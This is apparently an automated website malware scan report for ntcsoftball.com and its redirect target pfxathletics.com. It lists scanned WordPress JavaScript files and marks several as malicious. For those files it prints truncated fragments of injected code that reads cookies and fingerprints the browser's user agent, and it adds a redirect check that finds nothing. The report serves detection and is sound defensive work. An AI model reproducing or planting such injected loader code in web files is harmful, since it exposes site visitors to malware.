Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ntcsoftball.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.ntcsoftball.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 05 Oct 2014 10:38:47 GMT Location: http://www.pfxathletics.com/ Server: Apache Content-Length: 305 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.pfxathletics.com/ | 200 OK Content-Length: 32142 Content-Type: text/html | clean |
http://www.pfxathletics.com/wp-includes/js/jquery/jquery.js?ver=1.11.1 | 200 OK Content-Length: 96865 Content-Type: application/javascript | clean |
http://www.pfxathletics.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 8258 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t Antivirus reports:
| ||
http://www.pfxathletics.com/wp-content/plugins/LayerSlider/static/js/layerslider.kreaturamedia.jquery.js?ver=5.1.1 | 200 OK Content-Length: 58058 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t Antivirus reports:
| ||
http://www.pfxathletics.com/wp-content/plugins/LayerSlider/static/js/greensock.js?ver=1.11.2 | 200 OK Content-Length: 53353 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t Antivirus reports:
| ||
http://www.pfxathletics.com/wp-content/plugins/LayerSlider/static/js/layerslider.transitions.js?ver=5.1.1 | 200 OK Content-Length: 22153 Content-Type: application/javascript | clean |
http://www.pfxathletics.com/wp-content/themes/ace/js/jquery.jplayer.min.js?ver=4.0 | 200 OK Content-Length: 43914 Content-Type: application/javascript | clean |
http://www.pfxathletics.com/wp-content/themes/ace/js/jquery.prettyPhoto.js?ver=4.0 | 200 OK Content-Length: 26274 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t function getParam(name,url){name=name.replace(/[\[]/,"\\\[").replace(/[\]]/,"\\\]");var regexS="[\\?&]"+name+"=([^&#]*)";var regex=new RegExp(regexS);var results=regex.exec(url);return(results==null)?"":results[1];}})(jQuery);var pp_alreadyInitialized=false; Antivirus reports:
| ||
http://www.pfxathletics.com/wp-content/themes/ace/js/jquery.omslider.min.js?ver=4.0 | 200 OK Content-Length: 3710 Content-Type: application/javascript | clean |
http://www.pfxathletics.com/wp-content/themes/ace/js/libraries.js?ver=4.0 | 200 OK Content-Length: 5865 Content-Type: application/javascript | clean |
http://www.pfxathletics.com/wp-content/themes/ace/js/jquery.isotope.min.om.js?ver=4.0 | 200 OK Content-Length: 45912 Content-Type: application/javascript | clean |
http://www.pfxathletics.com/wp-content/themes/ace/js/jquery.validate.min.js?ver=4.0 | 200 OK Content-Length: 22659 Content-Type: application/javascript | clean |
http://www.pfxathletics.com/wp-content/themes/ace/js/jquery.form.min.js?ver=4.0 | 200 OK Content-Length: 14979 Content-Type: application/javascript | clean |
http://www.pfxathletics.com/wp-content/themes/ace/js/jquery.hoverIntent.js?ver=4.0 | 200 OK Content-Length: 5996 Content-Type: application/javascript | clean |
http://www.pfxathletics.com/wp-content/themes/ace/js/jquery.superfish.js?ver=4.0 | 200 OK Content-Length: 6762 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ntcsoftball.com
Result:
GET / HTTP/1.1
Host: ntcsoftball.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: ntcsoftball.com
Referer: http://www.google.com/search?q=ntcsoftball.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ntcsoftball.com
Referer: http://www.google.com/search?q=ntcsoftball.com
Result:
The result is similar to the first query. There are no suspicious redirects found.